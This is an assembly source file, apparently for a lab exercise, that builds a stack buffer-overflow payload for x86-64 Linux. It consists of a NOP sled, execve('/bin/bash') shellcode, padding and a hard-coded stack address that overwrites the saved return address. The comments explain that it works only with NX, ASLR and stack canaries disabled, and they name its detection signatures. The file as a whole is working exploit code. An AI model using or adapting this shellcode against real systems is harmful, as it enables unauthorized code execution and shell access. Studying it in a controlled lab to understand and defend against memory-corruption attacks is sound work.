;-----------------------------------------------------------------------
; Lab stack-smashing payload (NASM, Intel syntax, x86-64 Linux, flat binary).
; Layout: NOP sled -> execve("/bin/bash", NULL, NULL) shellcode -> padding
; to a fixed size -> 8 bytes over the saved rbp -> a hard-coded stack
; address over the saved return address.
; It only functions against a target with every modern mitigation off:
; an executable stack (no NX/W^X), no ASLR (the return address below is a
; fixed 0x7fff... stack value), and no stack canary (the saved rbp/rip
; are overwritten blindly). Any one of those defaults defeats it, and the
; long NOP run plus the "/bin/bash" string are the usual detection hooks.
;-----------------------------------------------------------------------
bits 64
global _start

_start:
        times 400 nop                   ; NOP sled: any landing point inside it slides into the code below

        ; 59 sys_execve const char *filename const char *const argv[] const char *const envp[]
        ; (rdi, rsi, rdx, r10, r8, r9)  -- Linux syscall argument registers (note r10, not rcx)
        mov rax, 59                     ; system call number (59 = sys_execve)
        lea rdi, [rel binbash]          ; load ptr to bash string into rdi (RIP-relative, so position-independent)
        xor rsi, rsi                    ; zero rsi: argv = NULL (Linux tolerates a NULL argv; not portable)
        xor rdx, rdx                    ; zero rdx: envp = NULL
        syscall                         ; on success never returns; on failure execution falls into the NOPs below
        times 5 nop
binbash: db '/bin/bash', 0x00           ; NUL-terminated path passed in rdi

ALIGN 512                               ; 512-byte alignment for this code after here
                                        ; (pads the payload to a fixed size; presumably matches the
                                        ; target's buffer size -- confirm against the lab target)
times 8 nop                             ; overwrite saved rbp
dq 0x7fffffffe090                       ; overwrite rip ([rbp+8]) -- fixed stack address, valid only
                                        ; for one specific no-ASLR layout; appears debugger-derived
;dq 0x7fffffffe1c0                      ; overwrite rip ([rbp+8]) -- alternative address, disabled